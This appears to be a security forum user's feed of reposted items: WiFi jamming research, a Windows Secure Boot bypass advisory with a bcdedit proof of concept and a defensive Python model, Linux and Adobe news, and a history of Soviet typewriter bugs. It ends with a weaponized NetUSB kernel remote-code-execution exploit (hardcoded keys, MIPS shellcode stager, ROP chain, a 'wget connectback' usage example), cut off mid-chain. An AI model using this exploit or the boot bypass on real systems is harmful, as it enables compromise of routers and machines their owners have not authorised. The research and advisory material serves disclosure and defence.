Everything posted by Nytro
Advanced WiFi Attacks Using Commodity Hardware

The WiFi protocol assumes all clients behave fairly. This means a station will give others a chance to transmit packets before it starts transmitting itself. It's known that with a software defined radio such as a USRP, a user can implement the WiFi protocol themselves and not follow these rules.

A desktop computer, antenna, two USRPs on top of each other, and a signal analyzer.

An attacker can also use this equipment to create a constant jammer, which continuously transmits noise and makes the channel completely unusable. In principle an attacker could also turn on a badly shielded microwave to jam the channel. However, that doesn't give the attacker control over which frequency is jammed, the bandwidth of the emitted noise, nor the emitted noise pattern. It's even possible to implement a more sophisticated selective jammer. Such a jammer is capable of only jamming specific packets (e.g. only packets sent by a certain device). While it's already known this is possible using expensive hardware such as USRPs, we found that even cheap WiFi dongles can be used to implement all these attacks. It's especially surprising that a selective jammer can be implemented on a cheap WiFi dongle, since it must be fast enough to detect and subsequently jam a packet.

Our attacks were first published at ACSAC 2014 and subsequently demonstrated at BruCON 2015. Additionally our code is available on github! You can also online.

Selfish Behavior

When a station wants to transmit a packet, but the channel is already in use by another device, it first waits until this transmission is done. Then it waits a random period (called the backoff period), and if no one else starts transmitting during this period, the station may send the packet. We found that it's easy to disable the random backoff period on commodity devices, meaning it will instantly transmit packets.

More interestingly, we found that even the original driver and firmware for our device incorrectly calculated the backoff period, giving itself an unfair advantage over other stations! It turns out that many devices do this to gain an unfair advantage:

"Over six Wi-Fi cards, neither one performs as expected. In some cases, implementation issues seem to affect the proper card operation. In other cases, manufacturers rely on backoff parameters different from the standard specification, this perhaps being done on purpose to provide an unfair advantage." [Minimized conclusion from this paper]

This raises the question of what would happen if there are two stations that both behave selfishly by disabling the backoff period. In other words, what happens if two selfish stations instantly transmit all packets they have queued? You may think that the packets of both selfish stations will collide, and as a result both are lost in the collision. It turns out this is not the case! Due to the capture effect, the packet having the highest signal quality and lowest bitrate will get decoded properly. You can compare this to receiving two radio stations on the same frequency, where generally one station will "win the collision". This means selfish stations will abuse the capture effect, and reduce their bitrate, in order to win the collision (and have their packet decoded correctly by the receiver). Surprisingly, we now get that selfish clients wanting to maximize their throughput will reduce their bitrate!

One of our WiFi dongles attached to a Raspberry Pi

There is a research prototype called DOMINO which can detect and punish this type of selfish behavior. Unfortunately we discovered a critical flaw in this system. The problem is that this system bases some of its decisions on unauthenticated packets. As an attacker we can abuse this by forging packets which appear to be sent by a different station. Hence we can make DOMINO believe this client is acting selfishly, meaning it will be punished and thrown off the network. Moral of the story: only base your decisions on authenticated or hard-to-forge data.

Constant Jammer

Our WiFi dongles can also be used to implement a constant jammer. The idea is straightforward: make the radio instantly transmit packets (even if someone else is transmitting), and then send an infinite amount of packets without interruption. The second part is tedious, since we can't queue many packets due to the limited amount of memory available in the WiFi dongle. However, we can simulate an infinite amount of packets. The packets queued for transmission are stored in a linked list. By turning this queue into a circular list we can simulate an infinite amount of packets. What's interesting here is that in principle the jammer is constantly transmitting valid WiFi packets. However, because they are sent so fast after one another, other WiFi devices are unable to detect these packets. In other words, other WiFi devices operating in monitor mode only see noise, and will not detect/show any WiFi traffic.

Selective Jammer

Arguably the most impressive result is that our cheap dongle can be used to implement a selective (also called reactive) jammer. Such a jammer decodes the header of a packet still in the air, and based on information in the header, decides whether to jam the remaining content or not. This is not an easy feat to accomplish. The selective jammer must be fast enough to decode the header, make the decision to jam the packet, put the antenna in transmit mode, and finally jam the packet. All this needs to be done in just a few microseconds (an average WiFi packet takes ~200 microseconds to transmit)! Jamming the end of the packet is easy: simply inject a packet like we did for the continuous jammer. But there is no support or API to be notified when a packet is in the process of being received. How do we get around this?

The important realization is that there are two chips inside our WiFi device. The first one is the radio which processes the incoming physical signal, and uses Direct Memory Access (DMA) to write the packet to memory. The second chip is the main CPU which is responsible for communicating with the host over USB and controlling the radio chip. Hence we can use the main CPU to constantly monitor the memory where the packet will be saved. Once we detect that the radio chip is writing bytes to this memory location, we know a frame is being received:

When the memory is modified, we know a frame is being received.

With this clever trick we can detect when a frame is being received. Our jammer then reads the MAC address(es) in the header, and compares it to the MAC address of the station we are targeting. If they match, the remaining content of the packet is jammed. This will cause the CRC (called the ICV in WiFi) of the packet to be wrong, meaning the packet will be dropped by the receiver. The code of the reactive jammer is public, feel free to play around with it (against a test network).

Channel-Based Man-in-the-Middle Attack

As an example, we show how these low-layer attacks can be used to reliably manipulate encrypted traffic. Note that our goal is not to decrypt traffic. Instead, we want to be able to reliably drop, modify, and inject packets. This ability is typically required in order to launch actual (cryptographic) attacks against a higher-layer protocol. Previously when targeting wireless traffic, it was not clear how to do this: there were no known methods to obtain a (reliable) man-in-the-middle position between a client and access point if encryption is used.

In order to intercept (not decrypt) all traffic of an encrypted wireless network, we cannot simply create a rogue Access Point (AP) with a different MAC address. When a client connects to the access point, not only are the credentials verified (e.g. shared password), but also the MAC addresses of the client and access point. Hence the client and AP will detect that an attacker was forwarding packets under different MAC addresses. Setting up a rogue AP with the same MAC address as the real AP is futile: the client will simply directly communicate with the real AP (unless they are out of range of each other).

Our solution is to clone the access point on a different channel, but with the same MAC address as the real access point. We forward all frames to the real AP. In other words, we forward packets between both channels. Using the constant jammer we force clients to switch to the channel where our rogue AP is located. Since we did not modify the MAC address of the AP, and also didn't modify the MAC address of the client, the client will successfully connect to the (rogue) AP. We now have a (channel-based) man-in-the-middle position, allowing reliable manipulation of encrypted traffic.

Demonstration of the Channel-Based MiTM attack against WPA-TKIP

The channel-based man-in-the-middle attack can be used to break WPA-TKIP (people commonly, but incorrectly, refer to TKIP as WPA, and AES-CCMP as WPA2). The TKIP protocol was supposed to be a temporary replacement of WEP, designed to run on old hardware. Unfortunately, for backwards compatibility, many networks still support both TKIP and the newer AES-CCMP. If both these protocols are supported, the older TKIP protocol is used to encrypt all broadcast packets. Without going into detail, the channel-based man-in-the-middle allows us to apply existing TKIP attacks to broadcast packets. Hence you should configure your network so only (AES-)CCMP is enabled!

Posted by Mathy at 00:28

Source: http://www.mathyvanhoef.com/2015/10/advanced-wifi-attacks-using-commodity.html
CentOS 7 Linux OS Has Been Officially Released for the 32-Bit (i386) Architecture
By Marius Nestor, 15 Oct 2015, 05:35 GMT

The final release of the CentOS Linux 7 32-bit distribution

After being in development for quite a few months now, the port of the CentOS 7 Linux operating system to 32-bit (i686/x86) hardware architectures was finalized earlier this week.

Johnny Hughes has had the great pleasure of announcing the general availability of CentOS Linux 7 for the x86 (i386/32-bit) architectures, which is currently distributed on the official CentOS mirrors as an installable-only DVD ISO image, a Net Install ISO image, an Everything ISO image, as well as a minimal ISO image that includes a basic amount of packages.

"We would like to announce the general availability of CentOS Linux 7 for the 32-bit x86 (i386) architecture," says Johnny Hughes. "This is the first major release of the 32 bit x86 by the AltArch Special Interest Group. This release is based on the Source Code from the CentOS 7 (1503) x86_64 architecture and includes all current updates from the main CentOS 7 tree."

Users who want to install the CentOS 7 Linux operating system on 32-bit hardware are informed by the developers that the install process is identical to the one of the 64-bit version. Also, they should be aware of two known issues: installation on QEMU (KVM) i386 virtual machines requires the activation of the "Copy Host CPU" option, and the inability to exit the GNOME desktop environment using the menu. Download CentOS Linux 7 for 32-bit architectures right now from Softpedia.

Source: CentOS 7 Linux OS Has Been Officially Released for the 32-Bit (i386) Architecture - Softpedia
Vulnerability title (Microsoft): Trusted Boot Security Feature Bypass Vulnerability
CVE: CVE-2015-2552
Vendor: Microsoft
Product: Windows NT series 8.0+
Affected versions: See "systems affected".
Reported by: "Myria"

Vulnerability Summary:
=====================
An attacker with administrative access to a Windows machine with UEFI Secure Boot enabled may bypass code signing policy checks by putting intentionally-malformed configuration options in the boot configuration database (BCD).

Vulnerability Details:
=====================
On a Windows system with Secure Boot enabled, Windows doesn't correctly protect against attempts to enable features that are prohibited while UEFI Secure Boot is enabled, such as "test-signing" and the local kernel debugger. This allows things such as loading unsigned kernel drivers, or, in locked-down Windows installations like Windows RT, effecting a "jailbreak".

In Windows Vista and later, the boot configuration database ("BCD") is a registry hive used by the operating system boot loader to load and prepare the NT kernel (ntoskrnl.exe) for launch. In UEFI systems, this task is split between bootmgr.efi and winload.efi. The latter is what contains this vulnerability.

One of winload.efi's responsibilities is to take the settings in BCD and translate them to a simple command line for the kernel, similarly to Linux. When an attempt to enable a prohibited feature such as "test-signing" occurs the standard way, winload.efi will block the attempt by not passing the "/TESTSIGNING" command-line option to the NT kernel.

The BCD setting named "loadoptions" allows passing arbitrary kernel command line arguments to the NT kernel. An obvious attack would be to attempt to pass "/TESTSIGNING" by putting it into the "loadoptions" field. winload.efi counters this obvious attack by checking against a blacklist of strings, but fails to account for Unicode.

BCD, being a registry hive, stores all strings as UTF-16. To search for the prohibited strings, winload.efi calls wcsstr(). However, ntoskrnl.exe takes its command line as ASCII bytes. To do the conversion from Unicode to ASCII, winload.efi simply truncates each UTF-16 code point to 8 bits.

The bug is then simple: winload.efi is checking against pre-transformed data, while ntoskrnl.exe is checking post-transformed data. By replacing character(s) of a blacklisted string with Unicode characters that become the original character(s) when truncated to 8 bits, one can get past the wcsstr() check while still passing the desired parameter to the kernel.

Proof of Concept:
================
In an Administrator-privileged instance of PowerShell, execute the following command, then reboot:

bcdedit /set '{current}' loadoptions '/T_STSIGNING'

replacing "_" with the Unicode character U+0145 ("Latin Capital Letter N With Cedilla"). The machine will come back up with test-signing enabled, which can be seen by the watermark in the lower-right corner of the desktop.

Impact:
======
Users or programs with administrative access to a machine can escalate to kernel privilege by loading unsigned drivers, or using the kernel debugger to poke at kernel memory and gain arbitrary code execution. Users can intentionally use this on their own devices to bypass lockdowns for certain products (Windows Phone, Windows RT).

Mitigating Factors:
==================
- The attack requires administrative access.
- A watermark appears when this is enabled, but this is bypassable.

No public attack against systems for which the owner does not want the exploit is known.

Systems affected:
================
UEFI systems with Secure Boot enabled running the following:
Windows 8
Windows 8.1
Windows Server 2012
Windows Server 2012 R2
Windows 10
Windows Server 2016 Technical Preview
Windows RT 8.0
Windows RT 8.1
Windows Phone 8
Windows Phone 8.1
Windows Mobile 10 Preview

Advisory:
========
https://technet.microsoft.com/en-us/library/security/ms15-111.aspx

Solution:
========
Install KB3088195.
https://support.microsoft.com/en-us/kb/3096447 (mismatched number intentional)

Disclosure Timeline:
===================
Discovery: Approximately summer 2013
Vendor notification: Unknown
Vendor fixed vulnerability: October 13, 2015
Public advisory: October 13, 2015
Public disclosure: October 13, 2015

The author, the original discoverer, did not report it. The author believes that the disclosure happened in approximately spring 2015.

Source: [CVE-2015-2552] Windows 8+ - Trusted Boot Bypass - Pastebin.com
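As an added illustration of the check-versus-use mismatch the advisory describes (this is not Microsoft's code; the blacklist contents and the function names are assumptions), here is a model of the vulnerable filter beside a hardened one that matches on the data the kernel will actually see:

```python
# Assumed blacklist for illustration; the real list in winload.efi is not on the page.
BLACKLIST = ("/TESTSIGNING", "/DEBUG")


def to_kernel_view(loadoptions):
    """Model the conversion the advisory describes: winload.efi truncates
    each UTF-16 code unit to its low 8 bits before ntoskrnl.exe sees it."""
    return "".join(chr(ord(c) & 0xFF) for c in loadoptions)


def vulnerable_filter(loadoptions):
    """Pre-patch logic as described: wcsstr() matches on the UTF-16 text,
    but the kernel receives the truncated bytes.
    Returns (blocked, string_the_kernel_sees)."""
    blocked = any(bad in loadoptions for bad in BLACKLIST)
    return blocked, to_kernel_view(loadoptions)


def hardened_filter(loadoptions):
    """Check the representation the consumer acts on: transform first, then
    match. Also refuse input the transform would alter, since no legitimate
    option needs code units above U+00FF. Returns (blocked, kernel_view)."""
    kernel_view = to_kernel_view(loadoptions)
    if kernel_view != loadoptions:
        return True, None
    if any(bad in kernel_view for bad in BLACKLIST):
        return True, None
    return False, kernel_view


def audit(options):
    """Run the vulnerable filter over candidate loadoptions values and return
    those it lets through even though the kernel would see a blacklisted switch."""
    leaks = []
    for opt in options:
        blocked, kernel_sees = vulnerable_filter(opt)
        if not blocked and any(bad in kernel_sees for bad in BLACKLIST):
            leaks.append((opt, kernel_sees))
    return leaks


if __name__ == "__main__":
    # Constructed inputs; the first is the advisory's U+0145 proof-of-concept string.
    samples = ["/T\u0145STSIGNING", "/TESTSIGNING", "/NOEXECUTE=OPTIN"]
    for opt, seen in audit(samples):
        print("passes pre-transform check: %r -> kernel sees %r" % (opt, seen))
    for opt in samples:
        print("hardened filter: %r -> %r" % (opt, hardened_filter(opt)))
```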
This Guy Builds A Thor-Like Hammer that Only He Can Pick Up
Nytro posted a topic in Stiri securitate
Tuesday, October 13, 2015, Swati Khandelwal

If you have watched the most recent Avengers movie, then you would be aware of a scene where all the superheroes Iron Man, War Machine, Hawkeye, and Captain America take turns to lift Thor's hammer but fail. Someone has an explanation, Why?

Inspired by Thor's legendary hammer Mjolnir that is not liftable by anyone except Thor, an electrical engineer has built a real-life Mjolnir that only he can pick up. Electrical engineer Allen Pan, who also runs the Sufficiently Advanced YouTube channel, created a giant hammer that only he can lift, so long as the hammer is on a metal surface.

To make his hammer immovable, Pan made use of:
- A capacitive touch sensor (fingerprint sensor) attached to the handle
- An Arduino Pro Mini and a solid state relay, which serves as a switching device.
- A microwave oven transformer electromagnet that uses electricity to produce a very strong magnetic field.

The electromagnet creates a very strong magnetic field, strong enough that when the hammer is placed on a metal surface, it feels too heavy to lift. With only a little bit of programming, Pan made the fingerprint sensor act as a switch — so when he grabs the hammer's handle and places his thumb on the sensor, the electromagnets turn off, allowing only him to lift the hammer. When he moves his thumb over the sensor, the magnets switch OFF again, allowing nobody else to lift the hammer, except Pan.

"The handle is imprinted," Pan says, suggesting that "whosoever carries Thor's fingerprints" would be able to lift it. You can also watch the YouTube video, in which Pan tricked a bunch of people into trying to lift the hammer, but the only guy who finally lifted the hammer was him.

Source: http://thehackernews.com/2015/10/electromagnetic-thor-hammer.html
Adobe releases 69 security updates for Flash Player, Acrobat and Reader
by Jason Murdock, 14 Oct 2015

Adobe has released 69 security updates to address multiple vulnerabilities in Flash Player, Reader and Acrobat. Initially published on Adobe's Product Security Incident Response Team blog, two updates, APSB15-24 and APSB15-25, are needed to stay protected from security threats.

Acrobat and Reader

The Adobe security advisory lists 56 critical security updates covering Acrobat and Reader which could allow an attacker to take control of an infected computer. The updates are available now for Acrobat DC, XI and Reader X on Windows and Mac. Many of the flaws could lead to code execution, including memory corruption, heap buffer overflow and use-after-free vulnerabilities. Updates CVE-2015-4446, CVE-2015-5090 and CVE-2015-5106 resolve "validation bypass issues" that could give hackers increased privileges on an infected system. One notable flaw, CVE-2015-5091, resolves a validation bypass problem that could be exploited to cause a denial-of-service attack.

Adobe thanked a number of security research groups for helping to uncover the flaws, including the HP Zero Day Initiative, Google Project Zero and VeriSign iDefence Labs. The company released a 'pre-notification' on 8 October outlining the security vulnerabilities in the Adobe software.

Flash

Adobe released a further 13 fixes for Flash Player for Windows, Mac, Chrome OS and Linux. The CVE-2015-5569 to CVE-2015-7644 updates are all listed as critical, and most of the vulnerabilities could lead to code execution. One notable Flash flaw, CVE-2015-7628, could be exploited to "bypass the same-origin-policy and lead to information disclosure". This is the second batch of security fixes for Flash Player in the past month. Adobe revealed fixes for 23 critical vulnerabilities in the software on 21 September that could allow an attacker to take full control of an infected system.

David Bisson, writing on grahamcluley.com, explained that Flash has had a "tough couple of months" after numerous flaws were found in the product that were being used by Italian security company Hacking Team. "Adobe fixed the Hacking Team bugs in a large patch last month but, as this current patching cycle illustrates, researchers continue to find vulnerabilities in Flash by the dozen.

"I would therefore urge you to implement these updates ASAP before an attacker begins exploiting the vulnerabilities in the wild. It might also be worth enabling Click-to-Play for Flash, or disabling Flash altogether."

Source: http://www.v3.co.uk/v3-uk/news/2430399/adobe-releases-69-security-updates-for-flash-player-acrobat-and-reader
How Soviets used IBM Selectric keyloggers to spy on US diplomats
Highly sophisticated bugs went undetected for 8 years during the Cold War.
by Dan Goodin - Oct 13, 2015 9:15pm EEST

A National Security Agency memo that recently resurfaced a few years after it was first published contains a detailed analysis of what very possibly was the world's first keylogger—a 1970s bug that Soviet spies implanted in US diplomats' IBM Selectric typewriters to monitor classified letters and memos.

The electromechanical implants were nothing short of an engineering marvel. The highly miniaturized series of circuits were stuffed into a metal bar that ran the length of the typewriter, making them invisible to the naked eye. The implant, which could only be seen using X-ray equipment, recorded the precise location of the little ball Selectric typewriters used to imprint a character on paper. With the exception of spaces, tabs, hyphens, and backspaces, the tiny devices had the ability to record every key press and transmit it back to Soviet spies in real time.

A "lucrative source of information"

The Soviet implants were discovered through the painstaking analysis of more than 10 tons' worth of equipment seized from US embassies and consulates and shipped back to the US. The implants were ultimately found inside 16 typewriters used from 1976 to 1984 at the US embassy in Moscow and the US consulate in Leningrad. The bugs went undetected for the entire eight-year span and only came to light following a tip from a US ally whose own embassy was the target of a similar eavesdropping operation.

"Despite the ambiguities in knowing what characters were typed, the typewriter attack against the US was a lucrative source of information for the Soviets," an NSA document, which was declassified several years ago, concluded. "It was difficult to quantify the damage to the US from this exploitation because it went on for such a long time."

The NSA document was published here in 2012. Ars is reporting the document because it doesn't appear to have been widely covered before and generated a lively conversation Monday on the blog of encryption and security expert Bruce Schneier.

When the implant was first reported, one bugging expert cited in Discover magazine speculated that it worked by measuring minute differences in the time it took each character to be imprinted. That theory was based on the observation that the time the Selectric ball took to complete a rotation was different for each one. A low-tech listening device planted in the room would then transmit the sounds of a typing Selectric to a Soviet-operated computer that would reconstruct the series of key presses. In fact, the implant was far more advanced and worked by measuring the movements of the "bail," which was the term analysts gave to the mechanical arms that controlled the pitch and rotation of the ball. According to the NSA document:

"In reality, the movement of the bails determined which character had been typed because each character had a unique binary movement corresponding to the bails. The magnetic energy picked up by the sensors in the bar was converted into a digital electrical signal. The signals were compressed into a four-bit frequency select word. The bug was able to store up to eight four-bit characters. When the buffer was full, a transmitter in the bar sent the information out to Soviet sensors. There was some ambiguity in determining which characters had been typed. NSA analysts using the laws of probability were able to figure out how the Soviets probably recovered text. Other factors which made it difficult to recover text included the following: The implant could not detect characters that were typed without the ball moving. If the typist pressed space, tab, shift, or backspace, these characters were invisible to the implant. Since the ball did not move or tilt when the typist pressed hyphen because it was located at the ball's home position, the bug could not read this character either."

The implants were also remarkable for the number of upgrades they received. Far from being a static device that was built once and then left to do its job, the bugs were constantly refined. The document says:

"The Soviets continually upgraded and improved their implants. There were five varieties or generations of bugs. Three types of units operated using DC power and contained either eight, nine, or ten batteries. The other two types operated from AC power and had beacons to indicate whether the typewriter was turned on or off. Some of the units also had a modified on and off switch with a transformer, while others had a special coaxial screw with a spring and lug. The modified switch sent power to the implant. Since the battery-powered machines had their own internal source of power, the modified switch was not necessary. The special coaxial screw with a spring and lug connected the implant to the typewriter linkage, and this linkage was used as an antenna to transmit the information as it was being typed. Later battery-powered implants had a test point underneath an end screw. By removing the screw and inserting a probe, an individual could easily read battery voltage to see if the batteries were still active.

"The ingenuity of the Soviets was remarkable because they did not merely move from batteries as a source of power to alternating current. There were early versions and later versions of bugs that used both sources of power. NSA found that the first three implants were battery powered. The first of these was shipped to Moscow in October 1976, and the other two were shipped in April of 1977. The first bug that used alternating current as its source of power was shipped to Moscow in November 1977. The remaining nine machines that were found in Moscow used alternating current as their source of power and were more advanced than the first AC-powered bug. Five of the advanced model AC bugged typewriters were delivered to Moscow in February 1982. The remainder were delivered in January of 1984. The later battery-powered bugged typewriters found in the consulate in Leningrad were shipped in April of 1977 and March of 1982.

"All of the implants were quite sophisticated. Each implant had a magnetometer that converted the mechanical energy of key strokes into local magnetic disturbances. The electronics package in the implant responded to these disturbances, categorized the underlying data, and transmitted the results to a nearby listening post. Data were transmitted via radio frequency. The implant was enabled by remote control. Another advantage of these bugs was easy installation. Engineers estimated that a skilled technician could install an implant in a typewriter in a half hour. The integrated circuits were very sophisticated for that time period. The circuits contained one bit core memory, an advancement that NSA engineers had never seen."

A magnified view of the bugged Selectric power switch. NSA

The devices could be turned off to avoid detection when the Soviets knew inspection teams were in close proximity. Newer devices operated by the US may have had the ability to detect the implants, but even then an element of luck would have been required, since the infected typewriter would have to be turned on, the bug would have to be turned on, and the analyzer would have to be tuned to the right frequency. To lower this risk, Soviet spies deliberately designed the devices to use the same frequency band as local television stations.

The account of "Project Gunman," which was the name given to the once-covert operation to discover and respond to the implants, underscores how drastically hacking has changed in the past 40 years.

"It's a lot easier now because everything is connected," Schneier, who is chief technology officer of Resilient Systems Inc., told Ars. "Everything is computerized and [that] makes it so much easier. When you just have to hack into somebody's computer, even if it's completely separate from the Internet, it's a much easier job, and that's why everybody can do it, including the criminals."

Source: http://arstechnica.com/security/2015/10/how-soviets-used-ibm-selectric-keyloggers-to-spy-on-us-diplomats/
CVE-2015-3036 - NetUSB Remote Code Execution exploit (Linux/MIPS)
Nytro posted a topic in Exploituri
```python
#!/usr/bin/env python
#
# CVE-2015-3036 - NetUSB Remote Code Execution exploit (Linux/MIPS)
# ===========================================================================
# This is a weaponized exploit for the NetUSB kernel vulnerability
# discovered by SEC Consult Vulnerability Lab. [1]
#
# I don't like lazy vendors, I've seen some DoS PoC's floating around
# for this bug.. and it's been almost five(!) months. So lets kick it up
# a notch with an actual proof of concept that yields code exec.
#
# So anyway.. a remotely exploitable kernel vulnerability, exciting eh. ;-)
#
# Smash stack, ROP, decode, stage, spawn userland process. woo!
#
# Currently this is weaponized for one target device (the one I own, I was
# planning on porting OpenWRT but got sidetracked by the NetUSB stuff in
# the default firmware image, oooops. ;-D).
#
# This python script is horrible, but its not about the glue, its about
# the tech contained therein. Some things *may* be (intentionally?) botched..
# lets see if "the community" cares enough to develop this any further,
# I need to move on with life. ;-D
#
# Shoutouts to all my boys & girls around the world, you know who you are!
#
# Peace,
# -- blasty <peter@haxx.in> // 20151013
#
# References:
# [1] : https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt
#       /20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt
#

import os, sys, struct, socket, time
from Crypto.Cipher import AES

def u32(v):
    return struct.pack("<L", v)

def banner():
    print ""
    print "## NetUSB (CVE-2015-3036) remote code execution exploit"
    print "## by blasty <peter@haxx.in>"
    print ""

def usage(prog):
    print "usage : %s <host> <port> <cmd>" % (prog)
    print "example : %s 127.0.0.1 20005 'wget connectback..." % (prog)
    print ""

banner()

if len(sys.argv) != 4:
    usage(sys.argv[0])
    exit(0)

cmd = sys.argv[3]

# Here's one, give us more! (hint: /proc/kallsyms and objdump, bro)
targets = [
    {
        "name" : "WNDR3700v5 - Linux 2.6.36 (mips32-le)",
        "kernel_base" : 0x80001000,
        # adjust to offset used in 'load_addr_and_jump' gadget
        # should be some big immediate to avoid NUL bytes
        "load_addr_offset" : 4156,
        "gadgets" : {
            # 8c42103c lw v0,4156(v0)
            # 0040f809 jalr v0
            # 00000000 nop
            'load_addr_and_jump' : 0x1f548,
            # 8fa20010 lw v0,16(sp)
            # 8fbf001c lw ra,28(sp)
            # 03e00008 jr ra
            # 27bd0020 addiu sp,sp,32
            'load_v0_and_ra' : 0x34bbc,
            # 27b10010 addiu s1,sp,16
            # 00602021 move a0,v1
            # 0040f809 jalr v0
            # 02202821 move a1,s1
            'move_sp_plus16_to_s1' : 0x63570,
            # 0220f809 jalr s1
            # 00000000 nop
            'jalr_s1' : 0x63570,
            'a_r4k_blast_dcache' : 0x6d4678,
            'kmalloc' : 0xb110c,
            'ks_recv' : 0xc145e270,
            'call_usermodehelper_setup' : 0x5b91c,
            'call_usermodehelper_exec' : 0x5bb20
        }
    }
]

# im lazy, hardcoded to use the only avail. target for now
# hey, at least I made it somewhat easy to easily add new targets
target = targets[0]

# hullo there.
hello = "\x56\x03"

# sekrit keyz that are hardcoded in netusb.ko, sorry KCodes
# people, this is not how you implement auth. lol.
aesk0 = "0B7928FF6A76223C21A3B794084E1CAD".decode('hex')
aesk1 = "A2353556541CFE44EC468248064DE66C".decode('hex')

key = aesk1
IV = "\x00"*16
mode = AES.MODE_CBC
aes = AES.new(key, mode, IV=IV)
aesk0_d = aes.decrypt(aesk0)

aes2 = AES.new(aesk0_d, mode, IV="\x00"*16)

s = socket.create_connection((sys.argv[1], int(sys.argv[2], 0)))

print "[>] sending HELLO pkt"
s.send(hello)
time.sleep(0.2)

verify_data = "\xaa"*16
print "[>] sending verify data"
s.send(verify_data)
time.sleep(0.2)

print "[>] reading response"
data = s.recv(0x200)
print "[!] got %d bytes .." % len(data)
print "[>] data: " + data.encode('hex')

pkt = aes2.decrypt(data)
print "[>] decr: " + pkt.encode("hex")

if pkt[0:16] != "\xaa"*16:
    print "[!] error: decrypted rnd data mismatch :("
    exit(-1)

rnd = data[16:]

aes2 = AES.new(aesk0_d, mode, IV="\x00"*16)
pkt_c = aes2.encrypt(rnd)

print "[>] sending back crypted random data"
s.send(pkt_c)

# Once upon a time..
d = "A"

# hardcoded decoder_key, this one is 'safe' for the current stager
decoder_key = 0x1337babf

# NUL-free mips code which decodes the next stage,
# flushes the d-cache, and branches there.
# loosely inspired by some shit Julien Tinnes once wrote.
decoder_stub = [
    0x0320e821, # move sp,t9
    0x27a90168, # addiu t1,sp,360
    0x2529fef0, # addiu t1,t1,-272
    0x240afffb, # li t2,-5
    0x01405027, # nor t2,t2,zero
    0x214bfffc, # addi t3,t2,-4
    0x240cff87, # li t4,-121
    0x01806027, # nor t4,t4,zero
    0x3c0d0000, # [8] lui t5, xorkey@hi
    0x35ad0000, # [9] ori t5,t5, xorkey@lo
    0x8d28fffc, # lw t0,-4(t1)
    0x010d7026, # xor t6,t0,t5
    0xad2efffc, # sw t6,-4(t1)
    0x258cfffc, # addiu t4,t4,-4
    0x140cfffb, # bne zero,t4,0x28
    0x012a4820, # add t1,t1,t2
    0x3c190000, # [16] lui t9, (a_r4k_blast_dcache-0x110)@hi
    0x37390000, # [17] ori t9,t9,(a_r4k_blast_dcache-0x110)@lo
    0x8f390110, # lw t9,272(t9)
    0x0320f809, # jalr t9
    0x3c181234, # lui t8,0x1234
]

# patch xorkey into decoder stub
decoder_stub[8] = decoder_stub[8] | (decoder_key >> 16)
decoder_stub[9] = decoder_stub[9] | (decoder_key & 0xffff)

r4k_blast_dcache = target['kernel_base']
r4k_blast_dcache = r4k_blast_dcache + target['gadgets']['a_r4k_blast_dcache']

# patch the r4k_blast_dcache address in decoder stub
decoder_stub[16] = decoder_stub[16] | (r4k_blast_dcache >> 16)
decoder_stub[17] = decoder_stub[17] | (r4k_blast_dcache & 0xffff)

# pad it out
d += "A"*(233-len(d))

# kernel payload stager
kernel_stager = [
    0x27bdffe0, # addiu sp,sp,-32
    0x24041000, # li a0,4096
    0x24050000, # li a1,0
    0x3c190000, # [3] lui t9,kmalloc@hi
    0x37390000, # [4] ori t9,t9,kmalloc@lo
    0x0320f809, # jalr t9
    0x00000000, # nop
    0x0040b821, # move s7,v0
    0x02602021, # move a0,s3
    0x02e02821, # move a1,s7
    0x24061000, # li a2,4096
    0x00003821, # move a3,zero
    0x3c190000,
```
# [12] lui t9,ks_recv@hi 0x37390000, # [13] ori t9,t9,ks_recv@lo 0x0320f809, # jalr t9 0x00000000, # nop 0x3c190000, # [16] lui t9,a_r4k_blast_dcache@hi 0x37390000, # [17] ori t9,t9,a_r4k_blast_dcache@lo 0x8f390000, # lw t9,0(t9) 0x0320f809, # jalr t9 0x00000000, # nop 0x02e0f809, # jalr s7 0x00000000 # nop ] kmalloc = target['kernel_base'] + target['gadgets']['kmalloc'] ks_recv = target['gadgets']['ks_recv'] # patch kernel stager kernel_stager[3] = kernel_stager[3] | (kmalloc >> 16) kernel_stager[4] = kernel_stager[4] | (kmalloc & 0xffff) kernel_stager[12] = kernel_stager[12] | (ks_recv >> 16) kernel_stager[13] = kernel_stager[13] | (ks_recv & 0xffff) kernel_stager[16] = kernel_stager[16] | (r4k_blast_dcache >> 16) kernel_stager[17] = kernel_stager[17] | (r4k_blast_dcache & 0xffff) # a ROP chain for MIPS, always ew. rop = [ # this gadget will # v0 = *(sp+16) # ra = *(sp+28) # sp += 32 target['kernel_base'] + target['gadgets']['load_v0_and_ra'], # stack for the g_load_v0_and_ra gadget 0xaaaaaaa1, # sp+0 0xaaaaaaa2, # sp+4 0xaaaaaaa3, # sp+8 0xaaaaaaa4, # sp+12 r4k_blast_dcache - target['load_addr_offset'], # sp+16 / v0 0xaaaaaaa6, # sp+20 0xaaaaaaa7, # sp+24 # this gadget will # v0 = *(v0 + 4156) # v0(); # ra = *(sp + 20) # sp += 24 # ra(); target['kernel_base'] + target['gadgets']['load_addr_and_jump'], # sp+28 0xbbbbbbb2, 0xccccccc3, 0xddddddd4, 0xeeeeeee5, 0xeeeeeee6, # this is the RA fetched by g_load_addr_and_jump target['kernel_base'] + target['gadgets']['load_v0_and_ra'], # stack for the g_load_v0_and_ra gadget 0xaaaaaaa1, # sp+0 0xaaaaaaa2, # sp+4 0xaaaaaaa3, # sp+8 0xaaaaaaa4, # sp+12 target['kernel_base'] + target['gadgets']['jalr_s1'], # sp+16 / v0 0xaaaaaaa6, # sp+20 0xaaaaaaa7, # sp+24 target['kernel_base'] + target['gadgets']['move_sp_plus16_to_s1'], # ra # second piece of native code getting executed, pivot back in the stack 0x27b9febc, # t9 = sp - offset 0x0320f809, # jalr t9 0x3c181234, # nop 0x3c181234, # nop # first native code getting executed, 
